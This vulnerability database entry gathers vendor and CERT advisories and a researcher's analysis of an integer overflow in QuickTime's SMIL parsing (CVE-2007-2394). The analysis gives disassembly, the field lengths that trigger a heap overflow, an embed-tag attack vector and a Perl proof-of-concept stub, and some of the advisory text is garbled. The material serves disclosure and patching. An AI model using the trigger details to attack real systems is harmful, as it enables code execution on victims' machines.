VAR-200707-0547
Vulnerability from variot - Updated: 2025-04-10 20:23Integer overflow in Apple Quicktime before 7.2 on Mac OS X 10.3.9 and 10.4.9 allows user-assisted remote attackers to execute arbitrary code via crafted (1) title and (2) author fields in an SMIL file, related to improper calculations for memory allocation. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities. Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks.
Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications.
TITLE: Apple QuickTime Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA26034
VERIFY ADVISORY: http://secunia.com/advisories/26034/
CRITICAL: Highly critical
IMPACT: Exposure of sensitive information, DoS, System access
WHERE:
From remote
REVISION: 1.1 originally posted 2007-07-12
SOFTWARE: Apple QuickTime 7.x http://secunia.com/product/5090/
DESCRIPTION: Some vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system.
1) An unspecified error exists in the processing of H.264 movies.
2) An unspecified error exists in the processing of movie files.
5) A design error exists in QuickTime for Java, which can be exploited to disable security checks and execute arbitrary code when a user visits a web site containing a specially crafted Java applet.
6) A design error exists in QuickTime for Java, which can be exploited to bypass security checks and read and write to process memory.
7) A design error exists in QuickTime for Java due to JDirect exposing interfaces that may allow loading arbitrary libraries and freeing arbitrary memory.
8) A design error exists in QuickTime for Java, which can be exploited to capture the user's screen content when a user visits a web site containing a specially crafted Java applet.
QuickTime 7.2 for Mac: http://www.apple.com/support/downloads/quicktime72formac.html
QuickTime 7.2 for Windows: http://www.apple.com/support/downloads/quicktime72forwindows.html
PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Tom Ferris, Security-Protocols.com and Matt Slot, Ambrosia Software, Inc. 2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software. 3) The vendor credits Tom Ferris, Security-Protocols.com. 5, 6, 7) The vendor credits Adam Gowdiak. 8) Reported by the vendor.
CHANGELOG: 2007-07-12: Added link to US-CERT.
ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=305947
iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
OTHER REFERENCES: US-CERT VU#582681: http://www.kb.cert.org/vuls/id/582681
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA07-193A
Apple Releases Security Updates for QuickTime
Original release date: July 12, 2007 Last revised: -- Source: US-CERT
Systems Affected
Apple QuickTime on systems running
- Apple Mac OS X
- Microsoft Windows
Overview
Apple QuickTime contains multiple vulnerabilities.
I. Description
Apple QuickTime 7.2 resolves multiple vulnerabilities in the way Java applets and various types of media files are handled. Since QuickTime configures most web browsers to handle QuickTime media files, an attacker could exploit these vulnerabilities using a web page.
Note that QuickTime ships with Apple iTunes.
For more information, please refer to the Vulnerability Notes Database. For further information, please see the Vulnerability Notes Database. Solution
Upgrade QuickTime
Upgrade to QuickTime 7.2.
On Microsoft Windows, QuickTime users can install the update by using the built-in auto-update mechanism, Apple Software Update, or by installing the update manually. Disabling QuickTime in your web browser may defend against this attack vector. For more information, refer to the Securing Your Web Browser document. Disabling Java in your web browser may defend against this attack vector. Instructions for disabling Java can be found in the Securing Your Web Browser document.
References
-
Vulnerability Notes for QuickTime 7.2 - http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72
-
About the security content of the QuickTime 7.2 Update - http://docs.info.apple.com/article.html?artnum=305947
-
How to tell if Software Update for Windows is working correctly when no updates are available - http://docs.info.apple.com/article.html?artnum=304263
-
Apple QuickTime 7.2 for Windows - http://www.apple.com/support/downloads/quicktime72forwindows.html
-
Apple QuickTime 7.2 for Mac - http://www.apple.com/support/downloads/quicktime72formac.html
-
Standalone Apple QuickTime Player - http://www.apple.com/quicktime/download/standalone.html
-
Mac OS X: Updating your software - http://docs.info.apple.com/article.html?artnum=106704
-
Securing Your Web Browser - http://www.us-cert.gov/reading_room/securing_browser/
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA07-193A.html>
Feedback can be directed to US-CERT Technical Staff. Please send email to cert@cert.org with "TA07-193A Feedback VU#582681" in the subject.
For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/signup.html.
Produced 2007 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
Thursday July 12, 2007: Initial release
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr 4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV 8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ +ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8 a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ== =EV1X -----END PGP SIGNATURE----- .
II. When parsing an SMIL file, arithmetic calculations can cause insufficient memory to be allocated. When copying in user-supplied data from the SMIL file, a heap-based buffer overflow occurs. This results in a potentially exploitable condition.
III. This could be accomplished using a malicious SMIL file referenced from a website under the attacker's control.
IV. Previous versions are suspected to be vulnerable.
V. WORKAROUND
iDefense is currently unaware of any effective workarounds for this vulnerability.
VI. VENDOR RESPONSE
Apple has released QuickTime 7.2 which resolves this issue. More information is available via Apple's QuickTime Security Update page at the URL shown below.
http://docs.info.apple.com/article.html?artnum=305947
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-2394 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. CREDIT
This vulnerability was reported to iDefense by David Vaartjes from ITsec Security Services http://www.itsec-ss.nl/.
Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ .
iDefense confirmed the existence of this vulnerability in version 7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime binaries for Windows XP and Vista are identical, this issue will affect QuickTime running on Windows Vista also.
FIXED VERSIONS
Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this issue. See [2] for additional information about this update.
QuickTime 7.2 is not available for the Windows 2000 platform. Presumably, Apple dropped support for this platform.
PRODUCT DESCRIPTION
QuickTime is Apple's media player product. According to Apple, QuickTime is downloaded over 10 million times a month. According to Secunia, QuickTime is currently installed on over 50% of PCs [3].
The Synchronized MultiMedia Integration Language (SMIL) provides a high-level scripting syntax for describing multimedia presentations. SMIL files are text files that use XML-based syntax to specify what media elements to present and where and when to present them. This can be exploited to overflow that heap buffer with user supplied content, which eventually can result in the execution of arbitrary code.
-- --
When such a SMIL file is parsed the length value of the author field is stored in a short int data type (16 bit) without bounds checking. In sub_66952B50(), this value is (sign) extended to a long int data type (32 bit).
-- 66952C9A push eax 66952C9B call sub_668B57D0 66952CA0 --> movsx eax, word ptr [esp+2Ch+var_C] 66952CA5 mov edx, [esp+2Ch+arg_4] 66952CA9 lea ecx, [esp+2Ch+var_10] --
So, when the length of the author field is >= 0x8000 bytes, it will be extended to a length value between 0xffff8000 and 0xffffffff.
Next, in sub_668DCFD0() the sign extended length of the author field is added to the length of the title field + 0x20:
-- 668DD04D jnz short loc_668DD0A0 668DD04F test ebx, ebx 668DD051 jz loc_668DD1EB 668DD057 --> lea eax, [edi+ebx] // edi holds the length of // the title field + 0x20. // ebx holds the sign // extended length of the // author field. 668DD05A push eax 668DD05B push ecx --
In sub_668DCA60(), 4 is added to the result of the calculation:
-- 668DCB37 test edi, edi 668DCB39 jz short loc_668DCB40 668DCB3B --> lea eax, [edi+4] // edi holds the result 668DCB3E jmp short loc_668DCB42 --
Next, in sub_668F5550() the final length value is used as the dwBytes argument in a call to HeapRealloc():
-- 668F555E push eax // dwBytes (user specified) 668F555F push ecx // lpMem 668F5560 push 1 // dwFlags 668F5562 push edx // hHeap 668F5563 --> call ds:HeapReAlloc --
This allows for the allocation of a controlled amount of memory. For example, when setting the length of the author field to 0xff00 (65280) and the length of the title field to 0xdf (223), the following situation occurs:
1: sub_66952B50():
0x0000ff00 will be sign extended to 0xffffff00.
2: sub_668DCFD0():
0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00 resulting in a length value of 0xffffffff.
3: sub_668DCA60():
0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003.
4: sub_668F5550():
HeapRealloc() will allocate 0x00000003 bytes of memory.
Next, the pointer returned by HeapRealloc() is used by sub_668DCFD0() as the dest argument in a call to memcpy():
-- 668DD08E push ebx // count, length value right // after sign extension // (0xffffff00). 668DD08F push edx // src, buffer with user // supplied (author) content. 668DD090 add eax, esi 668DD092 --> push eax // dest, 3 byte buffer. 668DD093 call _memcpy 668DD098 add esp, 18h 668DD09B jmp loc_668DD1E5 --
This copy action will result in an overflow of the 3 byte heap buffer with data from the author field (user supplied). Due to the large amount of data written, this will finally result in an access violation when memory is read or written outside the heap page. The exception is handled by the program and execution continues with a corrupt heap.
For my platform (win2k), when a call to HeapAlloc() is executed the unlink code of ntdll will "fail" because we have overwritten pointers in the heap management structures of other heap buffers with our data. The status of the registers during unlinking is:
-- EAX 78787878 <-- user supplied ECX 78787878 <-- user supplied EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx" EBX 00000078 ESP 0012EDC8 EBP 0012EF84 ESI 01200000 EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx" --
-- 77f867e6 mov dword ptr ds:[ecx],eax 77f867e8 mov dword ptr ds:[eax+4],ecx --
The unlink instructions will result in the following exception:
QuickTimePlayerMain: QuickTimePlayer.exe
"The instruction at "0x77f867e6" referenced memory at "0x78787878". The memory could not be "written"
This shows that we are able to overwrite 4 bytes anywhere in the address space of the process with "any" 4 byte value we want, which can for example be exploited to overwrite function pointers like the SEH or UEF to gain control of the process. This 4 byte overwrite via the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking" is used on these platforms.
ATTACK VECTORS
This vulnerability can be triggered by luring a target user into running a malicious SMIL file locally or via a webpage. In the later scenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used:
SRC="available-sample.qtif" QTSRC="poc.smil" WIDTH="10" HEIGHT="10" PLUGINSPAGE="www.apple.com/quicktime/download" TYPE="video/quicktime" />
PROOF OF CONCEPT
!/usr/bin/perl -w
QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
Researched on QuickTime 7.1.3 on Windows 2000 SP4.
David Vaartjes
$file = "poc.smil"; $padd = "x"; $cop_len = 36;
By choosing the following lengths the
integer overflow will be triggered.
$tit_len = 223; $auth_len = 65280;
open(FH,">$file") or die "Can't open file:$!";
print FH "\n". "\n". " \n". " \n". " \n". "\n". "";
close(FH);
REFERENCES
[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php? id=556 [2] http://docs.info.apple.com/article.html?artnum=305947 [3] http://secunia.com/blog/7/
DISCLOSURE TIMELINE
04/02/2007 Initial vendor notification (by iDefense) 04/09/2007 Initial vendor response 07/11/2007 Apple security bulletin & patches available 07/11/2007 Public disclosure of iDefense advisory 09/03/2007 Public disclosure of this advisory
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200707-0547",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1.2"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1.3"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.0.4"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1.4"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.0.1"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1.5"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.0"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.0.2"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.1.1"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": null
},
{
"model": "quicktime",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "7.0.3"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": "quicktime",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "version"
},
{
"model": "quicktime",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "7.2"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "10.4.9"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "10.3.9"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1.5"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1.4"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1.3"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1.2"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1.1"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.0.4"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.0.3"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.0.2"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.0.1"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.0"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.5.2"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.5.1"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.5"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6.1"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "5.0.2"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "7.1"
},
{
"model": "quicktime player",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "6"
},
{
"model": "quicktime",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "7.2"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "BID",
"id": "24873"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:apple:quicktime",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jonathan \u0027Wolf\u0027 RentzschDavid VaartjesAdam Gowdiak\u203b zupa@man.poznan.pl",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
}
],
"trust": 0.6
},
"cve": "CVE-2007-2394",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2007-2394",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-25756",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-2394",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#582681",
"trust": 0.8,
"value": "8.66"
},
{
"author": "NVD",
"id": "CVE-2007-2394",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200707-274",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-25756",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#582681"
},
{
"db": "VULHUB",
"id": "VHN-25756"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000519"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-274"
},
{
"db": "NVD",
"id": "CVE-2007-2394"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Integer overflow in Apple Quicktime before 7.2 on Mac OS X 10.3.9 and 10.4.9 allows user-assisted remote attackers to execute arbitrary code via crafted (1) title and (2) author fields in an SMIL file, related to improper calculations for memory allocation. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities. \nRemote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Full Featured Secunia Network Software Inspector (NSI) is now\navailable:\nhttp://secunia.com/network_software_inspector/\n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. \n\n----------------------------------------------------------------------\n\nTITLE:\nApple QuickTime Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA26034\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/26034/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nExposure of sensitive information, DoS, System access\n\nWHERE:\n\u003eFrom remote\n\nREVISION:\n1.1 originally posted 2007-07-12\n\nSOFTWARE:\nApple QuickTime 7.x\nhttp://secunia.com/product/5090/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in Apple QuickTime, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\n1) An unspecified error exists in the processing of H.264 movies. \n\n2) An unspecified error exists in the processing of movie files. \n\n5) A design error exists in QuickTime for Java, which can be\nexploited to disable security checks and execute arbitrary code when\na user visits a web site containing a specially crafted Java applet. \n\n6) A design error exists in QuickTime for Java, which can be\nexploited to bypass security checks and read and write to process\nmemory. \n\n7) A design error exists in QuickTime for Java due to JDirect\nexposing interfaces that may allow loading arbitrary libraries and\nfreeing arbitrary memory. \n\n8) A design error exists in QuickTime for Java, which can be\nexploited to capture the user\u0027s screen content when a user visits a\nweb site containing a specially crafted Java applet. \n\nQuickTime 7.2 for Mac:\nhttp://www.apple.com/support/downloads/quicktime72formac.html\n\nQuickTime 7.2 for Windows:\nhttp://www.apple.com/support/downloads/quicktime72forwindows.html\n\nPROVIDED AND/OR DISCOVERED BY:\n1) The vendor credits Tom Ferris, Security-Protocols.com and Matt\nSlot, Ambrosia Software, Inc. \n2) The vendor credits Jonathan \u0027Wolf\u0027 Rentzsch of Red Shed Software. \n3) The vendor credits Tom Ferris, Security-Protocols.com. \n5, 6, 7) The vendor credits Adam Gowdiak. \n8) Reported by the vendor. \n\nCHANGELOG:\n2007-07-12: Added link to US-CERT. \n\nORIGINAL ADVISORY:\nApple:\nhttp://docs.info.apple.com/article.html?artnum=305947\n\niDefense:\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556\n\nOTHER REFERENCES:\nUS-CERT VU#582681:\nhttp://www.kb.cert.org/vuls/id/582681\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n National Cyber Alert System\n\n\t\tTechnical Cyber Security Alert TA07-193A\n\n\nApple Releases Security Updates for QuickTime\n\n Original release date: July 12, 2007\n Last revised: --\n Source: US-CERT\n\n\nSystems Affected\n\n Apple QuickTime on systems running\n\n * Apple Mac OS X\n * Microsoft Windows\n\n\nOverview\n\n Apple QuickTime contains multiple vulnerabilities. \n\n\nI. Description\n\n Apple QuickTime 7.2 resolves multiple vulnerabilities in the way\n Java applets and various types of media files are handled. Since QuickTime configures most\n web browsers to handle QuickTime media files, an attacker could\n exploit these vulnerabilities using a web page. \n\n Note that QuickTime ships with Apple iTunes. \n\n For more information, please refer to the Vulnerability Notes\n Database. For further information, please see\n the Vulnerability Notes Database. Solution\n\nUpgrade QuickTime\n\n Upgrade to QuickTime 7.2. \n\n On Microsoft Windows, QuickTime users can install the update by\n using the built-in auto-update mechanism, Apple Software Update, or\n by installing the update manually. Disabling QuickTime in your web browser may defend\n against this attack vector. For more information, refer to the\n Securing Your Web Browser document. Disabling Java in your web browser may defend against\n this attack vector. Instructions for disabling Java can be found in\n the Securing Your Web Browser document. \n\n\nReferences\n\n * Vulnerability Notes for QuickTime 7.2 -\n \u003chttp://www.kb.cert.org/vuls/byid?searchview\u0026query=QuickTime_72\u003e\n\n * About the security content of the QuickTime 7.2 Update -\n \u003chttp://docs.info.apple.com/article.html?artnum=305947\u003e\n\n * How to tell if Software Update for Windows is working correctly when no updates are available -\n \u003chttp://docs.info.apple.com/article.html?artnum=304263\u003e\n\n * Apple QuickTime 7.2 for Windows -\n \u003chttp://www.apple.com/support/downloads/quicktime72forwindows.html\u003e\n\n * Apple QuickTime 7.2 for Mac -\n \u003chttp://www.apple.com/support/downloads/quicktime72formac.html\u003e\n\n * Standalone Apple QuickTime Player -\n \u003chttp://www.apple.com/quicktime/download/standalone.html\u003e\n\n * Mac OS X: Updating your software -\n \u003chttp://docs.info.apple.com/article.html?artnum=106704\u003e\n\n * Securing Your Web Browser -\n \u003chttp://www.us-cert.gov/reading_room/securing_browser/\u003e\n \n\n ____________________________________________________________________\n\n The most recent version of this document can be found at:\n\n \u003chttp://www.us-cert.gov/cas/techalerts/TA07-193A.html\u003e\n ____________________________________________________________________\n\n Feedback can be directed to US-CERT Technical Staff. Please send\n email to \u003ccert@cert.org\u003e with \"TA07-193A Feedback VU#582681\" in the\n subject. \n ____________________________________________________________________\n\n For instructions on subscribing to or unsubscribing from this\n mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n ____________________________________________________________________\n\n Produced 2007 by US-CERT, a government organization. \n\n Terms of use:\n\n \u003chttp://www.us-cert.gov/legal.html\u003e\n ____________________________________________________________________\n\n\nRevision History\n\n Thursday July 12, 2007: Initial release\n\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 